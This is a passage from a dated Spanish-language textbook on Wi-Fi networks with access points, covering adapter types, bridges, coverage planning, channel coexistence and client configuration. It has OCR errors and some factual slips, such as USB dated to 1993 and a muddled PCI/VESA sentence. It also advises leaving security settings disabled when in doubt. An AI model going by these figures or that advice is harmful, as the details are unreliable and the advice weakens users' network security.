• Un puerto serie RS-232 para que se le pueda conectar un módem de red telefónica
(RTB o RDSI). Esta conexión a Internet a 56 Kbps o 64 Kbps puede ser utilizada
como acceso principal a Internet o como acceso de seguridad en el caso de que falle
la conexión de banda ancha (ADSL o cable módem).

• Un puerto paralelo o USB para conectarle una impresora. Esto permite compartir
una impresora sin la obligación de tener una computadora encendida para poder
mantener disponible la impresora. Además, la impresora no le ocuparía recursos a
ninguna computadora.

• Puerto para conectarle una antena exterior que le provea de un mayor alcance. En el
mercado existe una gran variedad de antenas externas que pueden dar respuesta a
muchas necesidades distintas. Si se necesita que el punto de acceso ofrezca
cobertura a una distancia superior a unos 100 metros, es importante contar con un
punto de acceso que disponga de un conector de este tipo.

4.4 GESTIÓN DEL PUNTO DE ACCESO

Los puntos de acceso ofrecen determinadas características que son configurables, como son
las opciones de seguridad o de gestión de la red. La mayoría permiten llevar a cabo esta
configuración a través de una interfaz basada en páginas web. Para hacer uso de esto, sólo
se necesita instalar el software que incluye el punto de acceso. No obstante, es importante
saber que algunos puntos de acceso no utilizan una interfaz web, sino que requieren de la
introducción directa de líneas comandos (lo que se conoce como CLI, Command une
Interface, ‘Interfaz de Línea de Comandos’) o, incluso, requieren de un sistema operativo
particular. Por ejemplo, Airport Base Station de Apple requiere disponer de una
computadora con sistema operativo Mac. En cualquier caso, siempre es buena idea
asegurarse de que el punto de acceso es compatible con nuestro sistema operativo.

REDES WLAN CON ACCESS POINT 82


Es posible duplicar la distancia a la cual los dispositivos pueden comunicarse, ya que éstos
actúan como repetidores de la señal. Desde que el Access Point se conecta a la red,
cualquier cliente tiene acceso a los recursos del servidor y, además, este dispositivo
gestiona el tráfico de la red entre las terminales más próximas. Cada Access Point puede
servir a varias máquinas, según el tipo y el número de transmisiones que se realicen.

4.5 ADAPTADORES INALÁMBRICOS DE RED

Los adaptadores de red son las tarjetas o dispositivos que se conectan a las computadoras
para que puedan funcionar dentro de una red inalámbrica. Estos equipos pueden recibir
también el nombre de tarjetas de red o interfaces de red. De hecho, en inglés se conoce
como NIC (Network Interface Cards, ‘Tarjetas Interfaces de Red’) a cualquier tarjeta
instalable o conectable a una computadora que sirve para integrarla en una red, sea ésta
cableada o inalámbrica.

Estos accesorios pueden encontrarse en formato de tarjetas PCMCIA (para portátil), PCI y
USB (para computadora de escritorio) y recientemente en formato SD (Secare Digital) para
nuestros PDAs. Los adaptadores de red son fundamentalmente unas estaciones de radio que
se encargan de comunicarse con otros adaptadores (modo ad hoc) o con un punto de acceso
(modo infraestructura) para mantener a la computadora a la que están conectados dentro de
la red inalámbrica a la que se asocie.

Como todos los equipos de radio, los adaptadores de red necesitan una antena. Ésta suele
venir integrada dentro del propio adaptador sin que externamente se note. Algunos
adaptadores, sin embargo, permiten identificar claramente su antena. En cualquier caso, la
mayoría de los adaptadores incluyen un conectar para poder disponer una antena externa.
Este tipo de antenas aumentan grandemente el alcance del adaptador.

REDES WLAN CON ACCESS POINT 83


4.6 TIPOS DE ADAPTADORES DE RED

Al igual que desde hace tiempo viene siendo normal encontrar computadoras que incluyen
de fábrica un puerto Ethernet RJ45, recientemente están apareciendo en el mercado algunas
computadoras portátiles que ya tienen integrado un adaptador de red. Actualmente, existen
los siguientes tipos de adaptadores inalámbricos de red (Figura 4.1):

• Tarjetas PCMCIA.
• Tarjetas PCI o ISA.
• Unidades USB.
• Adaptadores para PDA

Figura 4.1 Distintos tipos de adaptadores de red

REDES WLAN CON ACCESS POINT 84


4.6.1 TARJETAS PCMCIA

Uno de los problemas que tenían antiguamente las computadoras portátiles era que
difícilmente podían ampliarse en sus prestaciones. Para instalarle una tarjeta de red o un
módem a una computadora de escritorio, bastaba con añadir en su interior la tarjeta
correspondiente (ISA, PCI, etc.). El interior de los portátiles, sin embargo, estuvo
completamente cerrado hasta que aparecieron unos puertos especiales conocidos como
PCMCIA (Personal Computer Memory Card International Association, ‘Asociación
Internacional de Tarjetas de Memoria para Computadoras Portátiles’). En inglés se la
conoce más coloquialmente como PC Card (tarjeta de PC).

Las tarjetas PCMCIA las crearon en 1989 una asociación de fabricantes de equipos con el
propósito inicial de desarrollar una norma hardware y software para tarjetas de memoria
intercambiables (de ahí su" nombre). No obstante, la idea fue tan buena que se ha utilizado
para todo tipo de periféricos.

Los puertos PCMCIA son una especie de ranura en la que se pueden insertar unas tarjetas
del tamaño de una de crédito. Estas tarjetas quedan insertadas en el interior de la ranura, por
lo que la computadora portátil no pierde su integridad y fácil portabilidad. En el mercado
existen muchos tipos de tarjetas PCMCIA: módem, tarjetas de red Ethernet, discos duros,
etc.

4.6.1.1 CARACTERÍSTICAS DE LAS TARJETAS PCMCIA

Todas las tarjetas PCMCIA tienen un ancho de 54 milímetros, siendo su largo variable,
pero con un mínimo de 85.6 milímetros. El hecho de ser variable se debe a que algunas
tarjetas necesitan sobresalir hacia el exterior para mostrar algún tipo de conector, una
antena o, simplemente, porque necesitan más espacio (Figura 4.2).

REDES WLAN CON ACCESS POINT 85


En cuanto al grosor de las tarjetas existen tres tipos: las tarjetas tipo 1 con un grosor de 3.3
milímetros (utilizadas, por ejemplo, para ampliaciones de memoria), las de tipo 2 con un
grosor de 5 milímetros (son las habituales en los adaptadores de red inalámbricos) y las de
tipo 3 con un grosor de 10.5 milímetros (utilizadas, por ejemplo, por los discos duros).

Figura 4.2 Tarjetas de Red PCMCIA

Por una razón exclusivamente de espacio, cada tarjeta requiere su propio tipo de ranura en
la computadora. Esto quiere decir que una ranura de tipo 3 admite cualquier tipo de tarjeta,
mientras que una ranura de tipo 1 sólo admite tarjetas de este tipo.

El tamaño más habitual de las tarjetas es el de tipo 2. Aparte del tamaño y del peso, otra de
las características que aportan las tarjetas PCMCIA es su bajo consumo de energía y ser
resistentes a los golpes típicos de los dispositivos móviles.

Por cierto, los adaptadores WiFi PCMCIA suelen ser de tipo 2 (con bus de 32 bits tipo
CardBus) y la mayoría de las computadoras portátiles incluyen una o dos ranuras PCMCIA
de este tipo. Si tiene una computadora muy antigua, será mejor que compruebe si admite
este tipo de tarjetas antes de comprar el adaptador.

REDES WLAN CON ACCESS POINT 86


4.6.2 ADAPTADORES PCI E ISA

Las computadoras de escritorio no suelen incluir ranuras PCMCIA. Estas computadoras


suelen disponer de suficiente espacio interior como para admitir la instalación de nuevos
periféricos a base de tarjetas tipo PCI (Peripheral Components Interconnect, ‘Interconexión
de Componentes Periféricos’) o ISA (Industry Standard Architecture, ‘Arquitectura
Normalizada de la Industria’), como se muestra en la Figura 4.3. Si se tiene una
computadora que dispone tanto de ranuras PCI como ISA, siempre es más aconsejable
utilizar las de tipo PCI. Éstas suelen dar menos problemas de instalación y requieren menos
recursos del sistema (una sola IRQ frente a las des que requiere ISA).

Figura 4.3 Adaptador de red ISA y PCI.

4.6.2.1 CARACTERÍSTICAS DE LAS TARJETAS PCI E ISA

El mayor inconveniente que presentan los dispositivos PCI e ISA es que requieren ser
instalados en el interior de la computadora, por lo tanto es necesario abrirla para instalarlo.
Son de tipo de conexión Plug&Play (tipo conectar y funcionar) pero algunas veces es
necesario que se les instale el software de los controladores.

REDES WLAN CON ACCESS POINT 87


• ISA es un estándar de principios de los años ochenta. Por cierto, ISA, también
conocido como bus AT, puede transmitir información a una velocidad máxima de
16MBps.

• PCI es de principios de los años noventa (1993, exactamente). Fue desarrollado por
Intel siendo el primer estándar de bus local, el estándar VESA (Video Electronics
Standard Association, ‘Asociación para la Normalización de la Electrónica de
Vídeo’).

La principal novedad que trajo PCI fue el ser el primer sistema Plug&Play puede transmitir
información a una velocidad máxima de 528 Mbps.

4.6.3 ADAPTADORES USB

USB (Universal Serial Bus, ‘Bus Serie Universal’) es un nuevo puerto de comunicaciones
que se diseñó para poder mejorar la forma en cómo los periféricos se conectaban a las
computadoras, como se muestra en la Figura 4.4. Hasta que apareció USB en 1993, las
únicas posibilidades de conectar un periférico a una computadora eran mediante el puerto
serie o el puerto paralelo (además del puerto del teclado/ratón y el puerto de juego). El
inconveniente mayor con estos puertos es que sólo se podían conseguir velocidades de
transmisión de 115 Kbps. Adicionalmente, las computadoras sólo disponían de un puerto
paralelo y dos series, con lo que el número de dispositivos a conectar se reducía a tres;
además, son puertos que no le permiten a la computadora reconocer automáticamente el
dispositivo que tienen conectado, ni alimentarlos a través del propio puerto.

Todo lo anterior ha hecho que los periféricos USB hayan ido desplazando poco a poco al
resto de periféricos del mercado, hasta el punto de que ya existen computadoras que no
disponen de puertos serie ni paralelo, sino sólo puertos USB. Hoy en día, prácticamente
todos los tipos de periféricos ofrecen la posibilidad de ser conectados a la computadora a
través de un puerto USB: impresoras, módem, escáneres, cámaras, discos duros, etc.

REDES WLAN CON ACCESS POINT 88


4.6.3.1 CARACTERÍSTICAS DE USB

Desde el punto de vista de los adaptadores de red inalámbrica, USB ofrece la ventaja de
poder compartir el adaptador entre diferentes computadoras según se necesite. Como
instalar el adaptador es tan fácil como conectarlo al puerto USB, si una computadora
necesita conectarse a la red, se le enchufa el adaptador y listo.

Figura 4.4 Adaptadores de red USB

USB trajo las siguientes ventajas:


• No hace falta apagar la computadora para conectar o desconectar un periférico.
• La computadora reconoce automáticamente los periféricos que se conectan
mediante USB. Si es preciso, instalan automáticamente los controladores necesarios
para hacerla funcionar adecuadamente.
• Ofrecen una alta velocidad de transferencia de datos: hasta 12Mbps.

REDES WLAN CON ACCESS POINT 89


• Permite conectar hasta 127 dispositivos USB. Incluso, aunque la
computadora disponga de un solo puerto, basta con instalar un
multiplicador de puertos (un hub) para disponer de más puertos USB.
• Ofrece alimentación eléctrica a los periféricos a través del propio conector USB
(hasta 500 mA).
• Los periféricos USB pueden apagarse automáticamente cuando detectan que no se
están utilizando.
• Los periféricos USB se instalan automáticamente, sin necesidad de abrir la
computadora.
• Otras de las ventajas es que el adaptador puede reorientarse con respecto al punto
de acceso para buscar una mejor cobertura, sin tener que mover la computadora.
• El único inconveniente de los adaptadores USB es que son dispositivos externos a la
computadora. No quedan integrados dentro de él como lo hacen los adaptadores
PCMCIA, PCI o ISA.

4.7 ADAPTADORES PARA PDA

Un PDA es una pequeña computadora que cabe en la palma de la mano; de hecho, en inglés
también se les conoce como PalmPC, literalmente, ‘PC de la palma de la mano’ y el PDA
más vendido es el Palm Pilot de 3Com. Es cierto que también se les conoce como
PocketPC (PC de bolsillo) o como HandHeId PC (PC de mano).

Debido a su pequeño tamaño, los PDA pueden llevarse siempre encima, por lo que suelen
incluir aplicaciones que, de alguna manera, son asistentes personales de su usuario: agenda
de direcciones, agenda de actividades, lista de tareas, juegos, etc. No obstante, un PDA
puede utilizarse también como herramienta de comunicación; permite acceder a Internet,
ver páginas web, gestionar correos electrónicos, etc. De hecho, las nuevas PDA incluyen
versiones reducidas de programas de gestión tan conocidos como Microsoft Word, Excel,
etc. Definitivamente, un PDA es una pequeña computadora de gran utilidad debido
precisamente a su pequeño tamaño.

REDES WLAN CON ACCESS POINT 90


Figura 4.5 Adaptadores de red para PDA.

Habitualmente, un PDA se conecta a Internet a través de una computadora personal. Los


correos se escriben en el PDA, pero no se transmiten (o reciben) hasta que no se conectan
mediante un cable (o infrarrojos) a la computadora personal con el que se ha asociado
previamente. También existe la posibilidad de conectarle un módem especial al PDA y
acceder directamente a Internet a través de un proveedor de acceso (vía llamada telefónica).
En este sentido, han aparecido más recientemente en el mercado equipos PDA que incluyen
en su interior una terminal móvil, o teléfonos móviles que incluyen en su interior las
capacidades de los PDA, como se muestra en la figura 4.5.

4.8 BRIDGES

Un bridge ('puente') es un dispositivo que interconecta dos redes. Una vez interconectadas,
los equipos de una red pueden ver y comunicarse con los equipos de la otra red como si
todos formaran parte de la misma red. La mayoría de los puntos de acceso hacen las
funciones de bridges al poder interconectar una red local cableada con la red inalámbrica.
Esto hace posible que las computadoras de la red inalámbrica utilicen las impresoras de la
red cableada o accedan a los archivos de cualquiera de sus computadoras.

REDES WLAN CON ACCESS POINT 91


No obstante, existe un equipo conocido como bridge inalámbrico (Wireless
Bridge) que es algo distinto de un punto de acceso, como se muestra en la Figura 4.6.

Figura 4.6 Bridge inalámbrico.

Un bridge inalámbrico interconecta dos redes remotas (cableadas o no) mediante una
conexión inalámbrica. Estas dos redes pueden ser interconectadas también mediante cable,
pero los bridges inalámbricos evitan la necesidad de tener que instalar el cable.

4.9 SOFTWARE DE GESTIÓN

Los adaptadores de red, como el resto de periféricos, para su correcto funcionamiento


necesitan instalar un pequeño software que se conoce como controlador de dispositivo
(dríver en inglés). Este software es específico de cada sistema operativo y se instala, de
forma automática o manual, cuando se instala el adaptador o cuando se conecta a la
computadora por primera vez.

REDES WLAN CON ACCESS POINT 92


Los sistemas operativos suelen disponer de los controladores de dispositivos de los
periféricos más comunes del mercado. En muchos casos, es suficiente conectar el adaptador a
la computadora y automáticamente se instala todo lo necesario. Sin embargo, en otras
ocasiones, el sistema operativo no dispone del controlador adecuado. Para estos casos, el
fabricante suele incluir un CD con el adaptador que contiene los controladores para los
principales sistemas operativos. Incluso puede incluir un programa instalador del controlador.
Si no se dispusiese de este CD, también se puede acceder a la página web del fabricante del
equipo para intentar conseguirlo.

Para instalar y hacer funcionar una red inalámbrica, no hace falta más que el software que viene
incluido con el propio equipo. Como mucho, es posible que haga falta acceder a la web del
fabricante de algún adaptador de terminal para bajarse el controlador de dispositivo necesario
para nuestro sistema operativo. Por tanto, la necesidad del software no viene por hacer
funcionar la red, sino por conseguir unas características de gestión más adecuada a nuestras
necesidades. En el mercado existe una variedad de software muy útil para analizar y gestionar
la red inalámbrica. Entre otras cosas, este software sirve para identificar posibles huecos en la
seguridad de la red o para identificar redes activas en el entorno. Esto quiere decir que el
software sirve tanto para piratear las redes de otros como para asegurar la nuestra.

REDES WLAN CON ACCESS POINT 93


CAPÍTULO V
INSTALACIÓN DE UNA RED CON PUNTOS DE ACCESO

INTRODUCCIÓN:

A las redes inalámbricas WiFi con puntos de acceso se les conoce con el nombre de modo
infraestructura o modo BSS. La utilización de puntos de acceso es conveniente cuando se
pretende crear una red permanente, aunque sea con pocas terminales, cuando se desea
disponer de una amplia área de cobertura o crear una red inalámbrica con muchos usuarios.
Dicho de otra forma, salvo que se vaya a realizar una comunicación esporádica entre dos o
algunas más computadoras o se disponga de muy poco presupuesto, el modo normal de
configuración de las redes inalámbricas WiFi es con puntos de acceso.

Una ventaja adicional de las redes con puntos de acceso es que se disfruta de ciertas
características de gestión de red de las que carece completamente el modo ad hoc sin
puntos de acceso. En el mercado ha aparecido recientemente una alternativa a los puntos de
acceso que consiste en crear una red en modo ad hoc e instalar un software especial en una
de las computadoras de la red. Este software hace las funciones de punto de acceso
software. La única ventaja que tiene esta opción es que nos ahorramos el costo de un punto
de acceso, pero, a cambio, condena a una computadora a estar ocupada con esta tarea.

REDES WLAN CON ACCESS POINT 94


5.1 CARACTERÍSTICAS DE UNA RED CON PUNTOS DE ACCESO.

Como ya hemos visto, un punto de acceso es un equipo que funciona en las redes
inalámbricas WiFi como si fuera una estación base central que sirve de intermediario de
todas las comunicaciones entre las computadoras de la red. Las computadoras que se
conectan vía radio a los puntos de acceso necesitan disponer de un adaptador de red. El
adaptador de red es el mismo que el que se utiliza en las configuraciones ad hoc, salvo que
se configura para funcionar con un punto de acceso.

Otra de las ventajas de los puntos de acceso es que permiten interconectar la red
inalámbrica con una red local cableada e Internet. Para ello, los puntos de acceso disponen
de equipos de radio y antena para comunicarse con sus computadoras de forma inalámbrica
y de puertos Ethernet (10/100 BaseT, RJ45) para comunicarse con la red cableada, como se
muestra en la Figura 5.1.

Figura 5.1 Access Point conectado con una red cableada.

REDES WLAN CON ACCESS POINT 95


En las redes con puntos de acceso no se producen comunicaciones directas entre
computadoras (aunque estén una junto a otra), sino que todas ellas pasan por el punto de
acceso. Por lo tanto, el punto de acceso es el equipo del que dependen todas las
comunicaciones y desde el que se puede gestionar toda la red.

Cada punto de acceso dispone de un área de cobertura como se muestra en el ejemplo de la


Figura 5.2. Un área de cobertura es la zona dentro de la cual cualquier computadora puede
comunicarse con el punto de acceso de forma inalámbrica. El mayor o menor tamaño del
área de cobertura depende de distintos factores, como son:

• Localización del punto de acceso.


• Obstáculos entre el punto de acceso y la computadora.
• Interferencias radioeléctricas.
• Tipos de antenas utilizadas.

Figura 5.2 Red WiFi con punto de acceso.

REDES WLAN CON ACCESS POINT 96


Si se sitúan distintos puntos de acceso complementando sus coberturas, se puede llegar a
crear una red local inalámbrica con un área de servicio tan extensa como se desee.

5.2 PUNTOS DE ACCESO.

Si lo que se pretende cubrir es una pequeña área, una casa o una pequeña oficina, lo más
probable es que baste con colocar un solo punto de acceso en el lugar más céntrico y alto
posible. A veces, el lugar viene dado por el sitio donde se encuentra el acceso a Internet
(ADSL, módem cable o línea telefónica). Se complica cuando lo que se pretende cubrir es
una gran oficina, una zona empresarial, un campus universitario o todo un vecindario. En
estos casos hay que estudiar muy bien dónde se van a colocar los puntos de acceso.

El método de prueba y error consiste en realizar una inspección previa, decidir los lugares
de los puntos de acceso basados en esta primera inspección, hacer pruebas de cobertura con
la ayuda de una computadora portátil y recolocar los puntos de acceso hasta situarlos en su
posición idónea. En cualquier caso, antes de proceder a instalar los puntos de acceso, es
necesario tener claro el área que se desea cubrir y cuántos usuarios simultáneos habrá en
cada área. Un área muy congestionada puede necesitar más de un punto de acceso.

5.2.1 COBERTURA DE LOS PUNTOS DE ACCESO

Ya sabemos que la cobertura de un punto de acceso puede variar entre los 30 y los 300
metros dependiendo de las condiciones de visibilidad entre emisor y receptor y de las
posibles interferencias que se puedan producir en la zona. En los espacios abiertos se
consiguen los mayores alcances, mientras que en los lugares de interior con paredes y
muebles se consiguen alcances muy reducidos. Esto quiere decir que los puntos de acceso
no se pueden colocar con el único criterio del alcance teórico Por otro lado, la potencia de
transmisión de un punto de acceso varía entre los 100 mW (límite máximo de acuerdo con
la regulación europea) y 1W (límite máximo de acuerdo con la regulación norteamericana).

REDES WLAN CON ACCESS POINT 97


Evidentemente, a más potencia, mayor es el alcance. No obstante, no siempre interesa que
un solo punto de acceso tenga una gran cobertura. Si lo que se pretende cubrir es, por
ejemplo, una pequeña oficina o una sala de reuniones, el disponer de una cobertura mucho
mayor (llegando a la calle o a las oficinas vecinas) no tiene ningún interés; sin embargo, se
aumenta el riesgo de seguridad de la red.

Por otro lado, cuando se intenta cubrir un área donde se concentran muchos usuarios, un
ejemplo se muestra en la Figura 5.3, a menor cobertura de cada punto de acceso, más
puntos de acceso serán necesarios para cubrir la misma área y mayor será el ancho de banda
total disponible (pueden ser 11 Mbps o 54 Mbps por cada punto de acceso dependiendo de
la tecnología que se utilice).

Figura 5.3 Access Point instalado en una oficina.

Por lo tanto, aunque un equipo pueda tener un gran alcance, siempre hay que configurarlo
para que ofrezca la cobertura justa necesaria.

REDES WLAN CON ACCESS POINT 98


5.2.2 COEXISTENCIA DE PUNTOS DE ACCESO.

Típicamente, cada canal del protocolo DSSS de WiFi necesita 22 MHz de ancho de banda
(aunque esto puede variar); no obstante, tiene asignado 25 MHz por canal para minimizar
las interferencias entre canales. Como la banda de 2.4 GHz en la que trabaja WiFi tiene un
ancho de banda total de 80 MHz, esto quiere decir que en una misma zona sólo pueden
coexistir tres canales (tres puntos de acceso) sin que haya interferencia entre canales, a
continuación se muestra un ejemplo en la Figura 5.4.

Figura 5.4 Coexistencia de los puntos de acceso.

REDES WLAN CON ACCESS POINT 99


Por otro lado, cada punto de acceso facilita un ancho de banda de 11 Mbps o 54Mbps. Al
situar dos o tres puntos de acceso juntos, se consigue aumentar el ancho de banda
disponible a 22 ó 33 Mbps, o 108 ó 162 Mbps. En este caso, cada usuario sólo podrá
disponer de un máximo de 11 Mbps o 54 Mbps, pero el ancho de banda total disponible
para compartir entre todos los usuarios será de 22 ó 33 Mbps, o 108o 162Mbps.

5.2.3 ANCHO DE BANDA

El ancho de banda de que dispone cada punto de acceso WiFi es de 11 Mbps o 54 Mbps. Si
en un momento dado coinciden varias comunicaciones simultáneas a través del mismo
punto de acceso, los 11 Mbps o 54 Mbps se repartirán entre todas ellas. Por lo tanto,
dependiendo del número de usuarios simultáneos, el ancho de banda de cada comunicación
puede ser inferior o bastante inferior a 11 Mbps o 54 Mbps.

A pesar de lo anterior, tampoco es real decir que el ancho de banda de cada computadora es
el resultado de dividir 11 Mbps o 54 Mbps por el número de computadoras. La realidad es
que cada computadora no está transmitiendo y recibiendo datos de forma continúa.
Evidentemente, depende de la aplicación que se le dé, pero lo normal es que navegar por
páginas web, explorar el directorio de un disco duro remoto o utilizar una aplicación a
distancia suele tener momentos de transmisión de datos entre grandes silencios de
comunicación.

Esto hace que se consiga un gran aprovechamiento del ancho de banda común. Con 11
Mbps o 54 Mbps pueden trabajar decenas de usuarios en condiciones normales sin que se
noten grandes retardos, salvo en momentos puntuales. En cualquier caso, si en la zona de
cobertura de un punto de acceso se notan grandes retardos y se comprueba que no es debido
a interferencias, siempre se puede añadir un nuevo punto de acceso.

REDES WLAN CON ACCESS POINT 100


5.3 INSTALAR UNA RED DE PUNTOS DE ACCESO.

Como se ha comentado anteriormente, en las redes pequeñas hay poco que analizar: se
coloca el punto de acceso en el lugar más cómodo y se comprueba si cubre las expectativas.
En el peor de los casos, bastará con hacer un par de intentos de colocación antes de llegar a
la disposición óptima. El tema se complica un poco cuando se necesita cubrir una gran
extensión. En estos casos, si se quiere conseguir la mayor eficacia, no basta con situar los
puntos de acceso donde mejor parezca. Tampoco hay que confiar exclusivamente en el
sistema de prueba y error. En estos casos es recomendable realizar un estudio más
estructurado. Esto quiere decir que, antes de comenzar a poner puntos de acceso por
paredes y techos, nos hará falta responder a algunas preguntas como las siguientes:

• Con cuántos usuarios va a contar la red.


• Qué área se pretende cubrir con el servicio de red inalámbrico.
• Qué posibles fuentes de interferencias existen en sus inmediaciones.
• Cuál será la concentración de usuarios (usos simultáneos en una misma zona).
• Perfil de movilidad de los usuarios.
• Será suficiente con una velocidad de transmisión de 11 Mbps o 54 Mbps
dependiendo la tecnología que se utilizara.
• Qué equipamiento será necesario (adaptadores de red, puntos de acceso, etc.).
• La localización de los puntos de acceso.
• Cómo se interconectarán los puntos de acceso entre sí.
• La selección de canales.
• Qué nivel de seguridad se necesitará.
• Cómo se interconectará la red inalámbrica a la red cableada o Internet.
• Se necesitará expandir la red inalámbrica en un futuro. Si es así, dentro del mismo
edificio o fuera.
• Quién administrará la red.

REDES WLAN CON ACCESS POINT 101


Dicho de otra forma, cuanto mayor sea la red, tanto en extensión como en número de
usuarios, mayor será la necesidad de realizar un análisis previo que nos permita conocer en
detalle las necesidades y los recursos con los que se cuenta.

Figura 5.5 Instalación de Access Point en una empresa.

En general, el proceso de instalación de una red inalámbrica se compone de los siguientes


pasos:

• Realizar un análisis previo.


• Configurar las computadoras.
• Configurar e instalar los puntos de acceso.
• Instalar las conexiones entre los puntos de acceso.
• Configurar el acceso a Internet.

REDES WLAN CON ACCESS POINT 102


5.4 ANÁLISIS PREVIO A LA INSTALACIÓN DE LA RED.

El análisis previo supone simplemente definir las necesidades, analizar el terreno, estudiar
los posibles inconvenientes y calcular los recursos. El tener una idea clara de estos
conceptos ayudará grandemente a obtener una red adecuada y eficaz, más adelante se
muestra un ejemplo en la Figura 5.6.

1. Determinar las necesidades. Se parte de que se conoce exactamente el área que se


pretende cubrir y los usuarios de la red.

2. Hacer un esquema de cobertura. Dibujar un diagrama donde se especifiquen las áreas a


cubrir y las necesidades en cada área.

3. Decidir las áreas de movilidad. Habrá áreas en las que baste tener servicio, mientras que
en otras se necesitará garantizar además que el servicio no se corta cuando se desplaza el
usuario Tenemos, por lo tanto, que determinar las áreas con uno y otro tipo de movilidades.
Es posible que este último aspecto afecte a la distribución de los puntos de acceso. Las
opciones son las siguientes:

• Lugares con cobertura. Son aquellas zonas que tienen que estar cubiertas porque
hay usuarios que necesitan conectarse a la red desde ahí. Incluso puede haber zonas
que necesitan estar cubiertas muy esporádicamente.

• Lugares por los que desplazarse (roaming). Son las zonas por las que se desplazan
los usuarios haciendo uso de la conexión. Estas áreas deben garantizar una
continuidad del servicio aunque los usuarios estén en movimiento. Éste sería el
caso, por ejemplo, de un almacén donde se hace inventado.

REDES WLAN CON ACCESS POINT 103


4. Estudiar la cobertura real. Una vez descritas las necesidades, se puede hacer una
comprobación práctica de la cobertura. Se instala una tarjeta WiFi en una computadora
portátil, se va situando el punto de acceso y la pe portátil en distintos sitios y se va
comprobando el nivel de señal dentro de las áreas a cubrir. Esto nos da una idea de los
mejores lugares donde situar los puntos de acceso.

Para cada localización se debe comprobar tanto el alcance, como la respuesta (velocidad
máxima conseguida). Para comprobar el alcance, basta con desplazarse y ver que la
conexión sigue establecida. Para comprobar la calidad de respuesta, se pueden realizar
transferencias de archivos y ver la velocidad de transmisión de datos. En las zonas con
interferencias se notará que la velocidad de transferencia puede llegar a ser realmente baja.
Por cierto, la mayoría de los equipos WiFi incluyen un software de utilidades que permiten
verificar la calidad de la señal (fuerza de la señal, ruidos, velocidad de transmisión, etc.).

Este software puede resultar muy útil para estudiar la cobertura real. Hay que tener siempre
en cuenta que, en general, el mejor punto para colocar un punto de acceso será el centro de
la habitación en una posición elevada. En las habitaciones repletas de obstáculos, como
muebles, libreros, estantes, archiveros, etc., se consiguen coberturas inferiores que en las
habitaciones abiertas. Hay que evitar esconder el punto de acceso dentro de los típicos
cubículos separadores de las oficinas, en armarios o ponerlos cerca de objetos de metal.
Recuerde que algunos armarios de oficinas y mesas son de metal.

5. Identificar interferencias. El entorno radio eléctrico está sujeto a la presencia de


interferencias. Las interferencias pueden bajar el rendimiento del sistema; por ello, es
importante identificar las posibles fuentes de interferencias. Generalmente, estas fuentes
proceden de dispositivos como hornos microondas, teléfonos inalámbricos, dispositivos
bluetooth, motores (de ascensores, por ejemplo) o alarmas.

REDES WLAN CON ACCESS POINT 104


El impacto de estas fuentes de interferencia se puede comprobar haciendo pruebas de
transferencia con los dispositivos encendidos y apagados. Se puede utilizar el software de
utilidad que acompaña al equipo WiFi para comprobar las interferencias. En los lugares con
interferencias donde no se puede eliminar la fuente y sea necesaria la cobertura, se pueden
colocar puntos de acceso adicionales.

Figura 5.6 Instalación de una red con Access Point después de un análisis.

6. Hacer una instalación de prueba. Llegados a este punto, se tiene una idea muy clara de
las condiciones del entorno. No obstante, antes de empezar a instalar todos los puntos de
acceso, conviene hacer una primera instalación de prueba donde sólo se conecten unos
cuantos usuarios. Esto puede ayudar a detectar posibles problemas de desplazamiento
(roaming) o de congestión por interferencias.

REDES WLAN CON ACCESS POINT 105


7. Realizar la comprobación final. Una vez hechas todas las comprobaciones anteriores, se
contará con todos los datos necesarios para hacer la instalación: localización de los puntos
de acceso, identificación de zonas muertas, modelo de funcionamiento del roaming, fuentes
de interferencias, número y localización de los usuarios.

5.5 CONFIGURACIÓN DE LA RED.

Cualquier computadora que se desee conectar de forma inalámbrica a una red con puntos de
acceso necesita disponer de un adaptador de red (tarjeta WiFi) y configurarse
adecuadamente para que el adaptador se entienda con el punto de acceso de la red deseada.

Figura 5.7 Configuración de TCP/IP.

REDES WLAN CON ACCESS POINT 106


El proceso de instalación de estos dispositivos es idéntico tanto para la configuración de
redes inalámbricas en modo ad hoc, ya explicado anteriormente, como para el modo
infraestructura (con puntos de acceso).En cuanto a lo que hay que configurar desde la
computadora, hay que llevar a cabo dos tipos de configuraciones:

• Configurar el adaptador de red.

• Configurar el protocolo TCP/IP.

La operación de configurar el protocolo TCP/IP y el adaptador de red hay que repetirla con
cada computadora que se desee conectar al punto de acceso.

Cualquier computadora con un adaptador WiFi que tenga configurados correctamente los
parámetros anteriores y que esté dentro del área de cobertura radioeléctrica de cualquier
punto de acceso de la red formará parte de ella y, por lo tanto, podrá compartir sus recursos
y tener acceso a los recursos (configurados como compartidos) del resto de computadoras.

Esto quiere decir que, para añadir nuevas computadoras a la red, simplemente hay que
copiar los parámetros de cualquiera de las computadoras ya conectadas y configurárselos a
la nueva computadora. Por cierto, una misma computadora puede tener guardadas distintas
configuraciones de red, distintos perfiles (profile en inglés).

Esto es especialmente útil para aquellos casos en los que una misma computadora se
conecta a distintas redes. En estos casos no es necesario introducir todos los parámetros
cada vez que se cambia de red, sino, simplemente, elegir el perfil correspondiente.

REDES WLAN CON ACCESS POINT 107


Figura 5.8 Asistente de Windows para configurar una red inalámbrica.

5.5.1 CONFIGURAR EL ADAPTADOR DE RED.

Los adaptadores de red se configuran con una aplicación que viene en el CD incluido con el
equipo. Los parámetros a configurar son los siguientes:

• Tipo de red. En este caso, el tipo de red que hay que configurar es el BSS, también
conocido como infraestructura o con puntos de acceso.

REDES WLAN CON ACCESS POINT 108


• Nombre de red. El nombre de red debe ser el mismo que el configurado en el punto
de acceso, incluidos los caracteres en mayúscula y minúscula. Al parámetro nombre
de red también se le conoce como Network Ñame (‘Nombre de Red’ en inglés) o
SSID (Service Set Identifier, ‘Identificador del Conjunto de Servicios’). Muchas
aplicaciones de configuración de adaptadores de red ofrecen la posibilidad
de realizar una búsqueda automática de todas las redes del entorno que son
recibidas por el adaptador en ese momento. En este caso, sólo habría que escoger
un nombre de red de la lista.

• Canal. En este caso no es necesario configurar el canal porque el adaptador lo


tomará automáticamente del punto de acceso.

• Seguridad. Es importante que los parámetros de seguridad que aquí se configuren


sean los mismos que los configurados anteriormente en el punto de acceso. Si se
tiene dudas, simplemente se dejan deshabilitados los parámetros de seguridad.

Figura 5.9 Configuración de una tarjeta de red inalámbrica.

REDES WLAN CON ACCESS POINT 109


5.5.2 CONFIGURAR EL PROTOCOLO TCP/IP.

Configurar el protocolo TCP/IP en una computadora suele suponer configurarle una


dirección IP, una máscara de subred, una puerta de enlace y un servidor DNS. No obstante,
en el caso de los puntos de acceso, todas estas configuraciones suelen sustituirse por
configurar cada computadora para que obtenga las direcciones IP de forma automática. El
